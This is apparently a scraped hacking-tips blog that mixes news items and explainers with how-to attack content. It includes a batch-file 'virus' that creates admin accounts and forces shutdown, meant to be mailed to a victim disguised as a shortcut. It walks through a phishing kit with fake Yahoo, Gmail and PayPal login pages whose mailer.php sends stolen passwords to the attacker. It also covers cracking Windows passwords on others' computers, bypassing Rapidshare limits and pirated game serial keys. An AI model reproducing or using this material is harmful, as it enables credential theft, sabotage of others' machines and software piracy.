Your Ad Here

By Passing Rapidshare Time Limit.....

Some times it becomes frustrating for free user to download from rapidshare when it shows time to wait 15 minutes to 90 minutes........mainly in case of large files. There is simple trick to bypass that ......

  • Just goto rapidshare link you want to download files from.......
  • Click on Free User.....
  • Time count starts, Now click on Adressbox (where you type URL)
  • Type or Paste: javascript:alert(c=0)
  • Press enter..........

Now you are ready to download without any more wait......

Increasing Download Speed by 20%

QoS Packet Scheduler is a method of network bandwidth management that can monitor the importance of data packets and depending upon the priority of the packet, give it higher or lower priority or bandwidth levels. It's not very useful unless you're using apps which are QoS-aware or running a server, so you can gain some network overhead back by turning it off.

Note: This following tip will not work on XP Home Edition.

  1. Make sure you're logged on as actually "Administrator". Do not log on with any account that just has administrator privileges.

  2. Start > Run > type gpedit.msc (not available in home version).

  3. Expand the Local Computer Policy branch.

  4. Expand the Administrative Templates branch.

  5. Expand the Network branch.

  6. Highlight the "QoS Packet Scheduler" in left window.

  7. In right window double click the "limit reservable bandwidth" setting.

  8. On setting tab check the ENABLED item.

  9. Where it says "Bandwidth limit %" change it to read 0 (ZERO).

  10. Close gpedit.msc.

Effect is immediate on some systems, some need to re-boot.

Satyam Computer (into hacking) banned from World bank

Software major Satyam Computer Services has reportedly been banned from doing any off-shore work with the World Bank after forensic experts and bank investigators discovered that spy software was covertly installed on workstations inside the bank's Washington headquarters, allegedly by one or more contractors from Satyam Computer Services. ( Watch )

According to a FOX News report, apart from Satyam, two IP intrusions have been reported from China, and there have been six intrusions in all.

Investigators say that the software, which operates through a method known as keystroke logging, enabled every character typed on a keyboard to be transmitted to a still-unknown location via the Internet.

Upon its discovery, bank officials shut off the data link between Washington and Chennai, where Satyam has long operated the bank's sole offshore computer center responsible for all of the bank's financial and human resources information.

"I want them off the premises now," World Bank President Robert Zoellick reportedly told his deputies. But at the urging of CIO De Poerck, Satyam employees remained at the bank as recently as October 1 while it engaged in "knowledge transfer" with two new India-based contractors.

Satyam is publicly listed on the New York Stock Exchange and boasts having two billion dollars in sales and more than 150 Fortune 500 companies as clients.

In 2003, Satyam won a lucrative five-year "sole source" contract to design, write and maintain all of the World Bank's information systems. The contract, which began at $10 million, had grown to over $100 million by 2007. This year, the contract was not renewed. Satyam has declined to comment.

FOX News claims that outsiders have raided the World Bank Group's computer network, one of the largest repositories of sensitive data about the economies of every nation, repeatedly for more than a year.

It is still not known how much information was stolen. But sources inside the bank confirm that servers in the institution's highly restricted treasury unit were deeply penetrated with spy software last April. Invaders also had full access to the rest of the bank's network for nearly a month in June and July.

The crisis comes at an awkward moment for Zoellick, who runs the world's largest and most influential anti-poverty agency, which doles out $25 billion a year, and whose board represents 185 member nations.

This weekend, the bank holds its annual series of meetings in Washington, and just in advance of those sessions, Zoellick called for a radical revamping of multilateral organizations in light of the global economic meltdown.

Zoellick is positioning himself and the bank as an institution that can help chart a new path toward global financial stability. But that reputation, more than ever, depends on the bank's stable information infrastructure.

According to internal memos, "a minimum of 18 servers has been compromised," including some of the bank's most sensitive systems, ranging from the bank's security and password server to a Human Resources server "that contains scanned images of staff documents."

One World Bank director told FOX News that as many as 40 servers have been penetrated, including one that held contract-procurement data. It took ten days for bank officials to detect that they'd been invaded. Once they did, they shut down all external servers, except for e-mail, which it turns out the invaders were already using as their entrance point.

A World Bank spokesman, however, rubbished the Fox News story, saying it is riddled with falsehoods and errors.

From: Timesnow.com

IP Spoofing Explained

The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) sourceIP address with the purpose of concealing the identity of the sender or impersonating another computing system.

Why it works ?

IP-Spoofing works because trusted services only rely on network address based authentication. Since IP is easily duped, address forgery is not difficult.

The main reason is security weakness in the TCP protocol known as sequence number prediction.

How it works ?

To completely understand how ip spoofing can take place, one must examine the structure of the TCP/IP protocol suite. A basic understanding of these headers and network exchanges is crucial to the process.

Internet Protocol (IP) :

It is a network protocol operating at layer 3 (network) of the OSI model. It is a connectionless model, meaning there is no information regarding transaction state, which is used to route packets on a network. Additionally, there is no method in place to ensure that a packet is properly delivered to the destination.



Examining the IP header, we can see that the first 12 bytes (or the top 3 rows of the header) contain various information about the packet. The next 8 bytes (the next 2 rows), however, contains the source and destination IP addresses. Using one of several tools, an attacker can easily modify these addresses – specifically the “source address” field.

Transmission Control Protocol (TCP) :

It is the connection-oriented, reliable transport protocol in the TCP/IP suite. Connection oriented simply means that the two hosts participating in a discussion must first establish a connection via the 3-way handshake (SYN-SYN/ACK-ACK). Reliability is provided by
data sequencing and acknowledgement. TCP assigns sequence numbers to every segment and acknowledges any and all data segments recieved from the other end.


As you can see above, the first 12 bytes of the TCP packet, which contain port and sequencing information.

TCP sequence numbers can simply be thought of as 32-bit counters. They range from 0 to 4,294,967,295. Every byte of data exchanged across a TCP connection (along with certain flags) is sequenced. The sequence number field in the TCP header will contain the sequence number of
the *first* byte of data in the TCP segment. The acknowledgement number field in the TCP header holds the value of next *expected* sequence number, and also acknowledges *all* data up through this ACK number minus one.

TCP packets can be manipulated using several packet crafting softwares available on the internet.

The Attack

IP-spoofing consists of several steps. First, the target host is choosen. Next, a pattern of trust is discovered, along with a trusted host. The trusted host is then disabled, and the target's TCP sequence numbers are sampled. The trusted host is impersonated, the sequence numbers guessed, and a connection attempt is made to a service that only requires address-based authentication. If successful, the attacker executes a simple command to leave a backdoor.

Spoofing can be implemented by different ways as given below -

Non-Blind Spoofing :- This type of attack takes place when the attacker is on the same subnet as the victim. The sequence and acknowledgement numbers can be sniffed, eliminating the potential difficulty of calculating them accurately.

Blind Spoofing :- Here the sequence and acknowledgement numbers are unreachable. In order to circumvent this, several packets are sent to the target machine in order to sample sequence numbers.

Both types of spoofing are forms of a common security violation known as a Man In The Middle Attack. In these attacks, a malicious party intercepts a legitimate communication between two friendly parties. The malicious host then controls the flow of communication and can
eliminate or alter the information sent by one of the original participants without the knowledge of either the original sender or the recipient. In this way, an attacker can fool a victim into disclosing confidential information by “spoofing” the identity of the original sender, who is presumably trusted by the recipient.

IP spoofing is almost always used in what is currently one of the most difficult attacks to defend against – Denial of Service attacks, or DoS.

Crack Rapidshare Download limit

RapidShare also limit free users, based on their IP address, to certain download limit, and after reaching the limit, RapidShare will block your IP address. To overcome RapidShare download limit, since it’s based on IP address, the techniques to change or mask the IP address will come in useful to hack the RapidShare.

There are several ways to change your IP address (or at least showing different IP address to RapidShare). Whatever ways, you need to clear your web browser’s cookies first.

1. Request new IP address from ISP (for dynamic IP address Internet users only)

  1. Click Start -> Run
  2. Type cmd in the Open box, then click OK.
  3. At the command prompt, run the following commands one by one:

    ipconfig /flushdns
    ipconfig /release
    ipconfig /renew
    exit
  4. Try to download from RapidShare again.
  5. Note: It’s possible to put all the commands above into a batch file and simply run the batch file to complete the IP changing process. To create the batch file, use Edit in command prompt or Notepad, copy and paste the above commands into the editor, and save the file with extension of .bat or .cmd (for Notepad, change the File Type to All File too).

2. Use a proxy server, or a different proxy server

You can get a list of available public proxy server easily by searching “proxy server” in search engine such as Google or Yahoo!. Choose a proxy server and note down its IP address and port number.

In Internet Explorer, go to Tools -> Internet Options -> Connections -> LAN Settings. Select (check) the option of Use a proxy server for your LAN. Then key in the proxy server IP address and port in respective box. Click OK to continue.

In Mozilla Firefox, go to Tools -> Options -> Connection Settings. Then select (click) Manual proxy configuration and key in proxy server information. Click OK to continue.

Obviously, once you hit the download limit, you will need to change the proxy server again. There are tools that help you to switch the proxy server automatically. In Internet Explorer, try Steganos Internet Anonym 2006 from Steganos or Hide IP from V7soft. In Firefox, use the SwitchProxy extension. Both software allow you to change the proxy server easily, with just few clicks.

Keys For Some famous Games

1503 A.D. The New World serial: 0705-7933859-6725970-0015
Age Of Mythology br Serial: P3HM4-WDM27-662XW-9BPTV-CFVMQ
Al Qaeda Hunting 3D serial: 23822
Back and White Br serial : 0901-3324366-4702210-2081
Battlefield 1942 Serial : 5000-0000000-0000000-1318
Battlefield 1942: Secret Weapons of WWII: 2gyy-3wlk-8btf-wjur-g277
Battlefield Vietnam: V2W6-54VJ-9R11-XJPV-79CM
Battlefield 2: TW99-NWBV-0PVZ-EAEI-JVTL
BLACK & WHITE BR - 0901-3324366-4702210-2081
Black & White: Creature Isle serial: 1740-9488245-5171152-1858
Chrome (c) Take 2: XTITY-92Y9L-MGPVA-KJ4Z6
CLIVE BARKER’S UNDYING - 2500-0911911-0911911-2705
Comanche 4 serial: 3s2d-flt1-cls2-rule-7865
Command & Conquer Generals: Zero Hour Expansion:
ULPF-ZEVK-FRWG-Q4YJ-6F2T
Command & Conquer: Renegade serial: 056894-929488-118387-9679
COMMAND E CONQUER GENERALS SERIAL: 4963-7882913-5984076-0674
Copa do Mundo FIFA 2002 BR SERIAL: 5500-5827167-6713862-1708
Dark Reign 2 CD Key : GAR3-RAB8-FUP9-NYZ7-2832
Dead Man’s Hand S/N: DEVB-Q7S3-Z5T8-ZGE8-AZ84-JT3K
Delta Force 3: Land Warrior - s/n: N5E3-YXH2-G983-9WYB-B3ZS
Delta Force 4: Task Force Dagger serial: 72YL-R4SB-GKG6-3WKS-HQ27
Delta Force 5 Black Hawk Down serial: QF7S-HZMK-XLXP-CUJN-HDTZ
Delta Force Black Hawk Down: Team Sabre (Expansão)
Delta Force Xtreme: DFX-WESTIL-LKICKY-DULASS-ANYDAY
Serial: AV4E-YVQE-NACM-DD3M-KBW3
DELTA FORCE: LAND WARRIOR - N33G-6HM2-9Y8F-HD4U-M7S9
Devastation_CDKEY: 5B36F-976AA-6A471-58B8D-92B7B
DOOM 3 CD Key: VB44-6BWV-H6UZ-RRPE-5E
Dominius II Serial: 1111-1111-1111-064
Earth 2150 : Lost Souls Serial : 7XJC-UD2E-E83L-Z5T5
Emperor: Rise of the Middle Kingdom Serial : BAC9-RAL8-SAS2-SAX2-9999
Empire Earth: Art of Conquest Serial : GER2-MAN2-RAP2-PER5-2252
F1 2002 SERIAL: 7931-9865028-6024865-1156

F1 champiship season 2000 serial: 2000-5005241-5005241-6839
FA_Premier_League_Manager_2002: 4507-1863659-3033569-5650
FIFA 2003 BR: BL7G-929A-2YXE-UFZZ
FIFA SOCCER 06: ON99-FLZU-9DEV-WTFM-6DEV
Freedom Fighters: PQGY-4FAQ-TMQ5-Q4X8-KXCS
FREEDOM FORCE: 1439-8808778-3837107-2854
Frontline Attack - War over Europe SERIAL: FUBP-EYNZ-KFXC-SKM2
Galactic Civilizations With Bonus serial: DN-500792-GC1-CLS4FLT8XT
GLOBAL OPERATIONS: 5000-0000000-0000000-5021
Ground Control Serial : RAC2-RAL2-CAS3-RAD3-3542
half life couter strike serial: 2462-92319-7642
half life edição especial:UCF1840810021327
half life opposing force serial: 2708-43011-3332 ou UCF1840810021327
HALF LIFE: UCF1840810021327
HALF-LIFE - 2420-92220-4482
HALF-LIFE: COUNTER-STRIKE - 2462-92319-7642
HARRY POTTER : 0901-7014788-4117807-0206
Harry Potter: Quidditch World Cup: 3FJA-LVDF-DAJP-34HR-RDEV
HARY POTER E A CAMERA SECRETA SERIAL: 7954-3123341-1387427-3052
Heli Heroes - serial: 8bnk-c9eh-63hb-kj88
Hidden and Dangerous 2: 1234-5678-9abc-dddf
Homeworld 2 (c) SIERRA: NAS3-DEC2-BYJ5-CUJ6-8385
homeworld: BAB2-BAB2-CEZ8-TAC3-9978
Hoyle_Majestic Chess: XYN6-NAB4-FES2-MUX7-3485
IGI 2 COVERT STRIKE SERIAL: 031F-F8D0-6536-B510
James Bond 007: NightFire Serial : 1740-9488245-5171152-5578
Judge Dredd: Dredd Vs. Death: NUN6-GAB2-TAX7-ZYG6-3537
Kelly Slater Pro Surfer Serial: 0f162xa28pg34dhc
Kingdom Under Fire Gold Edition serials: E3VI FP69 HT79 5KVG
Lego Soccer Mania serial: 1500-0776239-9370523-4726

madden nfl 2001: 1500-6610360-1643530-0243
Madden NFL 2004: VMZ9-JXRC-AZOR-J000-1911
Madden_NFL_2002_ CDKEY enter: 0901-5445152-2745753-4827
Medal Of Honor Allied Assault Breakthrough: L5KB-32WY-B6G5-6747-YQ49
Medal of Honor: Allied Assault CD Key, enter 5000-0000000-0000000-5068
MEDAL OF HONNOR: ALLIED ASSAULTKey: 7931-9865028-6024865-9663
Microsoft Flight Simulator 2002 - Airport 2002 Volume 1serial use:
A221-A24AABAA-FDBA5DD9
Moto Racer 3: 54e9-a751-1da8-e109-efb3-51f9-d90f-75d0-
2250
MVP Baseball 2003 CD Key: JNXC-PAPN-KR96-MY5P
nascar 2002 SERIAL: RAF2-RAL2-RAS2-RAX2-6667
NASCAR RACING 4 - GAC7 REB8 TUX6 DAC2 7833
Nascar Thunder 2003 serial: NASC-ARTH-UNDE-RJAM
Nascar Thunder 2004: CLZH-PE48-R9RR-G9ZT-9DSW
NBA LIVE 2001 - 2001-0020601-0010978-6694
NBA Live 2001 CD Key: 2001-0020601-0010978-6694
NEED FOR SPEED 2003: HOT PURSUIT 2 serial: 8249-7EE3-84EW-TXGT
Need For Speed: Underground s/n: SQZZ-2Y44-8AS4-7QSQ-YDEV
Neverwinter Nights serial QFETM-MPU3X-DN6FF-MHFDA-YWARA-4HMPE-RDJTG
NHL 2002: 1000-2003004-0000000-4904
NHL 2004: 6T22-8L62-6666-8666-6666
O.R.B:SERIAL: JTRV74NVVKUJX7AM
Operation Flashpoint Gold Upgrade Red Hammer serial M3CZ P5186 XNEYL
CL0T7 513NT
OUT LIVE BR: c9523c-1a4466-237cb8-dc7e67
Pro Evolution Soccer 5: NXUD-PACV-EM2X-KPC9-6AYU

QUAKE III Arena - THWT37AB3P7JBTPC
QUAKE III Team Arena - TSBH 7CCG DPWP B2LT 84
QUAKE IV: 9TFP-TXCG-XFMM-XXR9-9DGT
Return to Castle Wolfenstein CD Key: CLAL-A7WJ-DTSJ-WARP-88
Rise of Nations:RXVC3-B3347-DVG9X-FTFQF-9M7XT
Roller Coaster Tycoon 3 serial: RLDU-M24D-83CX-C8LZ-WDHS-ETND
S.W.A.T. 3 - Elite Edition - TED4-SAB4-DUB7-CYJ2-8652
Sacrifice serial: xxxx-xxxx-xxxx-xxxx
Sail Simulator 4.2 Serial : SS42-V7CGQ-9BCGM-4C326-JW25C
Savage: The Battle for Newerth: LB42-Z05V-VK9S-I7BM-58S5
Sega GT Serial : GTJ08010-322007-01723
Serial do Tiger: 1500-3202255-2068109-2932
Shogun 2: CDKEYS = 0901-3721384-6427058-7026
Shogun Total War Serial : 1600-0052410-0052410-6424
SIM CITY 3000 UNLIMITED BR - 5001-9781634-6520278-1000
Sim City 4 Rush Hour *MULTI*: CLC4-5ZU8-6C4S-9W46-LS4E
simcity 4 serial: GRUS-4528-8217-1ULF
Simcoaster serial : 2001-0013101-0010978-2823
SIMGOLF: 5000-0000000-0000000-5071
SOLDIER OF FORTUNE 2: 3Z4J - J3PP - K848 - EWPK - 1F
SOLDIER OF FORTUNE GOLD - BEN6-MUC8-BEZ6-BUJ6-3764
Spell Force: 08AFX-CGGML-W260D-5RRP0-CVNFD
Spy Hunter Serial: SHU3E7RVCCRBFHSS
Star Trek Elite Force 2 - TFAK-7WCH-44RH-YJ7X-F9E9
Star Trek StarFleet Command : Orion Pirates Serial :
4008-B491-1DC3-0F6C
starfleet command 3 serial: 0000-0000-0000-K28K
STARTRECK: RYS8-LAB4-JEF8-BYM3-4652
Sub Command: Seawolf-Akula CDKEY: 0901-1315206-2102812-3248
SUPERBIKE 2001 - 1500-4288423-2982915-3163
Team Factor SERIAL: 2NKZYY9-2SKAKSC
Terminator 3: Rise of the Machines Serial: TTDA-H8VW-KJDV-NNKA

THE SIMS BR - 100486-585530-905808-0928
THE SIMS DELUXE BR SERIAL: 5500-5782961-4067120-2138

5500-7457886-5179416-4991
throne of darkness serial : RAC2-RAD2-RAC2-RAC2-3387
Tiger Woods PGA Tour 2002 serial: 5000-0000000-0000000-5045
TIGER WOODS PGA TOUR 2003 SERIAL: FLTR-0825-9192-1RLC
Tony Hawks Pro Skater 4: P4EPBTIQDAIH7WXM
Total Club Manager 2003 serial : 1500127097911060657818
Train Simulator - The Activities Serial: 6850-YV6AYS6B
Trainz serial, enter: RAZO-R9XI-XXXC-XXXT-XXGX-1911
Tron 2.0 (c) Disney Interactive: 9393-L9CN-PRTB-T7N4-5858
Universal Combat Serial: 2B46-97F6-OF33-99BB “Atenção o O podera ser
um 0″
Unreal Tournament 2003 Serial : LYR22-RZ743-A9D7T-CNNEN
War! Age of Imperialism: 1101-8603-2629-7418
Lord of the Rings: War of the Ring: XUF5-JUB2-JAB8-JUD3-4947
Lord Of The Rings The Return Of The King: s/n: TMXF-Q23L-LCEG-Y9WW-V94G
Harry Potter: Quidditch World Cup: 3FJA-LVDF-DAJP-34HR-RDEV
MSEE-5EL4-WYBB-DGLU-GDEV
6Q7F-WAAC-8QTH-WLC4-EDEV
Q3N6-2X4N-A4EA-NY64-GDEV
GJGQ-4SLL-EA4Y-FJSU-UDEV
5LM5-M22H-45YT-W88Z-2DEV
C6U4-7A49-4CE2-MUGL-8DEV
BH4U-GCNX-WMJ8-ZGKY-4DEV
KAU4-AVFV-34AK-782Y-4DEV
Y3QQ-TUGW-4NU4-ZG68-6DEV
Hidden and Dangerous 2: 1234-5678-9abc-dddf
Pinnacle Instant Video Album V1.01 Multilanguage: 7777777777
The Sims Num Passe de Magica: U9BK-8XSP-YAG4-WYL4-SDEV
PSB3-DLW5-3GPV-P8BU-HDEV
Judge Dredd: Dredd Vs. Death: NUN6-GAB2-TAX7-ZYG6-3537
CIVIL 3D V2004: 400-00000000
War! Age of Imperialism: 1101-8603-2629-7418
Freedom Fighters: PQGY-4FAQ-TMQ5-Q4X8-KXCS
Cakewalk MediaWorks Serial: CWMW1.00-009968
Neato MediaFace Serial: 7135be-1339bd-1a33-5c670
NHL 2004: 6T22-8L62-6666-8666-6666
FQ22-BXTP-FLT!-ELT!-FLT!
CHYQ-AVKH-CRKD-GRKD-CRKD
BZ8G-WCOL-L8JD-SUXM-LTBV
A75V-8YSW-JQ75-NE79-LC4W
ZZGY-JQVB-PJ4T-6K6K-4INY
B233-BN2E-BUL3-87C5-4YZA
AWZH-HVNV-P8FK-XHPQ-8EUJ
J4LL-PZID-QZEM-RPQ2-UHRF
RKRR-R3C4-QWP8-QUXI-96KC

Speed Up Firefox Browser

In address bar of your browser type "about:config", reset the values of given entries and if that value doesn't exist then right click to create a new one.


type ---> property name---> value to be set

bool--->"network.http.pipelining"---->true
bool--->"network.http.proxy.pipelining"--->true
integer--->"network.http.pipelining.maxrequests"-->8
integer--->"network.http.max-connections"---->48
integer--->"network.http.max-connections-per-server"--->16
integer--->"network.http.max-persistent-connections-per-proxy"--->16
integer--->"network.http.max-persistent-connections-per-server"--->8
integer--->"content.notify.backoffcount"--->5
interger--->"content.max.tokenizing.time"---->2250000
integer--->"content.notify.interval"--->750000
integer--->"content.switch.threshold"--->750000

bool--->"content.notify.ontimer"--->true
bool--->"content.interrupt.parsing"--->true
integer--->"nglayout.initialpaint.delay"--->0
integer--->"browser.cache.memory.capacity"--->65536

Journey Begins - First Step to hacking

To start with this tutorial you must be ready with following :
1. A port scanner Utility like nmap or superscan and experiment with them so that you can use them.......
nmap can be downloaded from insecure.org
2.A good anonymity like TOR or Wingate.
3.Desire to learn and research.

Tutorial:
1. Use port scanner to know what ports are opened in the target system.

Example command: nmap -sS 12.12.12.21

Result will look like below,

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2007-07-12 05:07 EST
Interesting ports on 12.12.12.21
(The 1637 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp filtered ftp
22/tcp open ssh
23/tcp open telnet
111/tcp open sunrpc
139/tcp open netbios-ssn
1024/tcp open kdm
6000/tcp open X11

2. Try to find the exact version of services

Example command: nmap -sV –version-all host.com

3. Search for existing vulnerabilities for this exact service version.
4. Analyze the changelog details of soft wares in their release notes.
5. Now, you can know the security problems of this abc service and its 1.xx version.
6. Understand how the attacks will be deployed for this.

These are not just steps; you have to work/retry hard to get positive results. And don’t try these against google.com or yahoo.com

After the basics, you have to consider about your anonymity. Don’t use simple proxies for anonymity. Try different networks such as TOR . Don’t use the formal techniques always.

All above things are just basics to understand security problems and attacks. Start preventing your system/network from attackers after knowing everything about attacks.

P.S : For learning purpose only.
: First try it on other computers on same router as you.
: Try for long forgotten sites which are not maintained now so that you can find vulnerabilities and their exploits.

TOR-A Must Have Tool for Security & Anonymous Surfing

Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, IRC, SSH, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.

Tor: Overview

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy.

Why we need Tor

Using Tor protects you against a common form of Internet surveillance known as “traffic analysis.” Traffic analysis can be used to infer who is talking to whom over a public network. Knowing the source and destination of your Internet traffic allows others to track your behavior and interests. This can impact your checkbook if, for example, an e-commerce site uses price discrimination based on your country or institution of origin. It can even threaten your job and physical safety by revealing who and where you are. For example, if you’re travelling abroad and you connect to your employer’s computers to check or send mail, you can inadvertently reveal your national origin and professional affiliation to anyone observing the network, even if the connection is encrypted.

How does traffic analysis work? Internet data packets have two parts: a data payload and a header used for routing. The data payload is whatever is being sent, whether that’s an email message, a web page, or an audio file. Even if you encrypt the data payload of your communications, traffic analysis still reveals a great deal about what you’re doing and, possibly, what you’re saying. That’s because it focuses on the header, which discloses source, destination, size, timing, and so on.



Download Link: http://www.torproject.org/download.html.en
Home Page: http://tor.eff.org/index.html.en

Feedburner hack: how to get 2500 subscribers overnight (video)

Taken From : http://thenextweb.org/2008/08/04/feedburner-hack-how-to-get-2500-subscribers-overnight-video/

Established blogs like ReadWriteWeb and Techcrunch proudly show a Feedburner chicklet that displays the sites popularity. But beware – since people are more likely to subscribe to a site with a bigger amount of readers, some sites manipulate the counter.
Every once and a while co-editor Patrick and I stumble on a shady looking website with a ton of readers. That made us wonder whether Feedburner is hackable. I’ve sacrificed my personal blog for a hacking experiment and the result; faking your subscriber count IS possible!
We found an easy way to hack Feedburner (Not the obvious hack that simply steals a chicklet from a popular site). Looking at the subscriber count at some sites, we’re not the first ones who found out, but we are the first ones to write it down. All it takes is an OPML file, a Netvibes Universe, and a good night’s sleep.
EDIT: While the hack still works, I am happy to tell you that Google and Netvibes are working on a solution to the problem. Steve Olechowski, co-founder Feedburner mailed me and said: “These things happen occasionally and are usually fixed in a couple of days”, he added that the feedburner counts do not influence advertisement measurement. Franck Mahon from Netvibes said: “We are working on a fix to filter out in the reporting the duplicates while still allowing people to add several instances of the widget to their startpage.” When things get fixed, it would be interesting to see the differences on some sites.
How to manipulate your Feedburner subscribers in two minutes

Watch Video:
http://www.vimeo.com/1463913

Moral of the story is: everybody can have a lot of Feedburner readers, which makes the service questionable as a measurement of performance. It’s up to Google/Feedburner to fix things up.
Once they do this, it will be very interesting to see which blogs suddenly lose a bunch of subscribers…

Above was from : Joop Dorresteijn

Tip to Crack Windows Xp or VISTA password......

In case of Windows 98 it was really easy to crack the user login password....
Just look for log files reverse the XOR and eureka...you got the password......

But in case of Vista and Xp the case is different because they use hash for encoding which is a one way encryption and almost impossible to crack without any software or live CD.

So here is the process easy and simple that any one can follow.......

Go to http://ophcrack.sourceforge.net/ and download iso file.......

Burn that file with any burning software like Nero, magic ISO, Daemon etc......
Screenshot 1:
Boot from this CD on target computer and it will detect all hash files on the target computer and crack the password for you.......

Screenshot 2:



A nice trick to take to your college or school computer lab......

Video:


PS: ophcrack is a big file and will take some time to download even on broadband...

ATS Chief Challeges Hackers


Flooded with offers of help from ethical hackers to track down Indian Mujahideen operatives who sent dire emails minutes after the blasts in Ahmedabad and Delhi, the Anti-Terrorism Squad has devised a stringent test.ATS top boss Hemant Karkare gives all applicants a simple task which has so far turned out to be surprisingly tough: Hack into my e-mail. So far no one has succeeded."I welcome anyone trying to help the police but since I cannot hire anyone and everyone, I decided to test their abilities. I asked them to hack into my e-mail account. So far, no one has got back to me. So what's the point of hiring them?" says Karkare.Police take the help of hackers when they want to access a suspect's e-mail account without letting him or her know he is under investigation. Among the various ways of getting access into a suspect's account is the art of fooling him. A hacker generally sends a mail to the suspect luring him to click on a link sent in the mail. As the suspect clicks on the link he is directed to a page created by the hacker. The page asks the suspect to log in again and as soon as he puts in his password, it reaches the hacker. However, for such methods to be successful the hacker has to be really smart and be able to fool the suspect.Ever since Indian Mujahideen sent e-mails to TV channels warning about the blasts, the ATS has been flooded with offers from ethical hackers to help track down the sender.Actually, till recently, police often sought help from ethical hackers to deal with the increase in technology-related crimes, as their personnel were not trained to handle such problems. An ATS officer says not wishing to be quoted on-record, "There are many hackers who are plain irresponsible and know very little. After helping us in one operation, they go around town boasting about their association with the police to raise their own stock. Some hackers waste a lot of our time citing various reasons and do not come up with results for the simple reason that they know nothing. Security agencies should be wary of such people."No wonder, Karkare says, "I am largely disappointed with the hackers' community."On the other hand, hackers claim the best among them are not coming forward to help the police because they are asked to work for free. Says a hacker who has assisted the police in several cases, "I can do it for free once, twice or 10 times. But after that the police must think of giving some remuneration for the hard work."Karkare, however, insists the police would not flinch from paying if they got good talent. "We are ready to pay any amount provided they show they are worth it," he says.Apparently, several psychologists too have been sending e-mails or calling the ATS chief offering to help. But when the ATS seeks their help, they insist on 'entering into a contract'. Police say they cannot do any such thing without testing their abilities.

Get Free Rapidshare Account

The process is easy but takes almost a weeks time to get a free Rapidshare Premium Account ....
Actually the account is not for free it is an earned .........

Various ways to earn Rapidshare Premium account are.........
1. Upload data files of more than 5 M.B size and as people will download files you earn points. This can take a lot of time if you don't have fan following on net.....

2. Other method is to go to paypal.com and sign up for a premier account. Skip the debit card portion as it is not compulsory. You can opt for it if you want to shop through your own bucks.

Now go to awsurveys.com sign up there and get fill feedback for few sites and you will earn half the paypal balance you require for the account and rest half you will get almost in a weak time when other adds apear on that site.

I've got mine account using this method.
Give it a try will not take more then 15 minutes.

Funny Virus for friends

his virus can be used to create headache to ur enemy or friend. Imagine if ur enemy needs to delete many user accounts that are created by u....??
type the following code in notepad and save it as headache.bat and mail to ur enemy.


echo off
Net localgroup administrator Dont a /add
Net localgroup administrator BE b /add
Net localgroup administrator AFRAID c /add
Net localgroup administrator IT g /add
Net localgroup administrator IS a /add
Net localgroup administrator NOT f /add
Net localgroup administrator A s /add
Net localgroup administrator VIRUS h /add
Net localgroup administrator JUST a /add
Net localgroup administrator CHECKING l /add
Net localgroup administrator A o /add
Net localgroup administrator NEW p /add
Net localgroup administrator PROJECT q /add
Net localgroup administrator DONT a /add
Net localgroup administrator ABUSE a /add
Net localgroup administrator ME a /add
Net user BUT a /add
Net user KICK a /add
Net user ASS a /add
Net user OF a /add
Net user YOUR a /add
Net user ANTIVIRUS a /add
Net user THIS a /add
Net user PROJECT a /add
Net user WONT a /add
Net user HARM a /add
Net user YOUR a /add
Net user PC a /add
shutdown -f -t 0




Place the .bat file link in any autorun.exe file or put it in startup or just make a shortcut of the file, place it on desktop and rename it with any shortcut your friend often uses.....

To change icon:

1) Right-click on the shortcut to bring up the context menu
2) Select the Properties command there
3) Press "Change Icon..." button
4) Select new icon there

More fakes for other sites......

More fakes for other sites are available here.....

Follow the same procedure

http://rapidshare.com/files/147936161/more_fakes_.rar


Fakes of yahoo, hotmail, gmail, orkut, facebook, myspace, hi5, paypal, rapidshare, ebay, runescape & photobucket are available

Yahoo email id hack............

Its been quite a hype about

How to hack the email id of a person........
How do I get a persons password......
all this is quite common and it is asked mainly by all those who don't even know what networking is or what is a server................

so how can such a person can hack into servers (like yahoo, google)which even professionals can't get into...........

most simple way is

INSTRUCTIONS:
1)Just download this file......just a 13kB zip file containing yahoo fake pages......
2)Extract the contents to of a folder
3)Edit mailer.php file with notepad and keep the email ID where you want hacked passwords to come as.
4)Uplaod all the 3 pages Loginerror.html ,index.html,mailer.php to a free webhost site
5)Send the site link to the victim
6)When he logs in tha uploaded yahoo fake page ,The ID pass which the victim entered will be sent to the email ID which you entered in mailer.php file.


Try it out........most simple way.......


More instructions......

*You need a hosting account with PHP installed.
If you do not have one you can make one for free @ http://www.tripod.lycos.co.uk/ or http://www.igotfree.com or search for more webhosts with PHP support , no forced ads.

*You only need to change 2 variables in this script.
- ($to = "Put_Email_Here@yahoo.com";) Email
- ($mailOrText = "YeS";) "yes" for email "no" for text file on server

*Place YOUR email between the quotes $to = "emailid@yahoo.com";

*Upload ALL the files to the server!

If you are not able to upload files in lycos then use some other server the best is
"www.ripway.com"